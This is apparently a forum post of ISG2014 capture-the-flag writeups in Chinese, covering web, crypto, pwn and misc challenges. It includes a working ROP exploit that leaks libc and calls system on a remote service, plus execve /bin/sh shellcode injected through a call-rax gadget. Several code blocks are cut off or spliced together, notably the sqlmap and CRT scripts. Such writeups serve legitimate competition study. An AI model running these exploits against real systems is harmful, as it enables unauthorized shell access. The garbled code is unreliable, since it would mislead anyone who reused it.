阅读:1802回复:0
ISG2014 Writeups
所有文件打包下载:ISG.zip
Smile Web 200 php 源代码审计 图片:2014101109351673887.png Cryptobaby Crypto 100 按照程序逻辑,把 0x403018 处的数据按 131 进制分开成字符即可。 Pwnme Exploit 300 漏洞为很明显的栈溢出,但没有提供 libc,需要自行获取 libc 中的函数地址。 在这里我们使用 pwntools 来获取 system 的地址,把参数写在 data 段并最终执行。 执行 system 时有很奇怪的偏移问题这里稍微调整了一下最后执行 system gadget 在栈上的位置。 #!python #!/usr/bin/env python2 from zio import * from pwn import * @MemLeak def leak_write(addr): io.read_until('Pwn me if you can:n') payload = 'A' * 24 + l64(poprdi) + l64(1) + l64(poprsi) + l64(addr) + junk + l64(write_plt) + l64(main) io.write(payload.ljust(0x100, 'A')) ret = io.read(256) return ret target = './pwnme' target = ('202.120.7.69', 34343) poprdi = 0x400663 poprsi = 0x400661 # pop rsi; pop r15; ret ret = 0x400664 write_got = 0x601018 write_plt = 0x400480 main = 0x4005bd junk = 'J' * 8 data = 0x601040 read_plt = 0x4004a0 io = zio(target, print_read=False, print_write=False, timeout=100000) elf = DynELF('./pwnme', leak_write) system = elf.lookup('system') log.success('system: %s' % hex(system)) io.read_until('Pwn me if you can:n') payload = 'A' * 24 + l64(poprdi) + l64(0) + l64(poprsi) + l64(data) + junk + l64(read_plt) + l64(poprdi) + l64(data) + l64(ret) * 5 + l64(system) io.write(payload.ljust(0x100, 'A')) io.write('cat /home/pwnme/flag'.ljust(0x100, 'A')) io.interact() SQLMAP Misc 100 题目提供了 sqlmap 运行时的流量,按照 SQL 语句及执行结果推断每个字节即可。 #!python #!/usr/bin/env python2 import sys, re def remove(idx, sign, value): sub = xrange(0, value) if sign == ' '/bin//sh'): #a: 99 cltd #b: 89 de mov %ebx,%esi #d: 53 push %rbx #e: 55 push %rbp #f: 48 89 e7 mov %rsp,%rdi #12: 6a 3b pushq $0x3b #14: 58 pop %rax #15: 0f 05 syscall call_rax = 0x40070d shellcode = '9989de53554889e76a3b580f05'.decode('hex') + 'x90' + '/bin//sh' host = '202.120.7.73' port = 44445 io = zio((host, port)) payload = shellcode + l64(call_rax)[:6] io.write(payload) io.interact() GIF Misc 50 GIF 第二帧为一二维码,内容即为 flag。 丫丫 Crypto 400 流量中包含了 7 组公钥和密文。考虑到 e=3,使用 Håstad's Broadcast Attack 方法,可使用中国剩余定理对原文求解。发现 7 组原文并不完全相同,从中枚举 3 个尝试解密最终获得 flag。 #!python #!/usr/bin/env python2 from operator import mod, mul, sub, add import re, os, collections, sys import fractions import itertools def eea(a,b): """Extended Euclidean Algorithm for GCD""" v1 = [a,1,0] v2 = [b,0,1] while v2[0]0: p = v1[0]//v2[0] # floor division v2, v1 = map(sub,v1,[p*vi for vi in v2]), v2 return v1 def inverse(m,k): """ Return b such that b*m mod k = 1, or 0 if no solution """ v = eea(m,k) return (v[0]==1)*(v[1] % k) def crt(ms, _as): """ Chinese Remainder Theorem: ms = list of pairwise relatively prime integers as = remainders when x is divided by ms (ai is 'each in as', mi 'each in ms') The solution for x modulo M (M = product of ms) will be: x = a1*M1*y1 + a2*M2*y2 + ... + ar*Mr*yr (mod M), where Mi = M/mi and yi = (Mi)^-1 (mod mi) for 1 |
|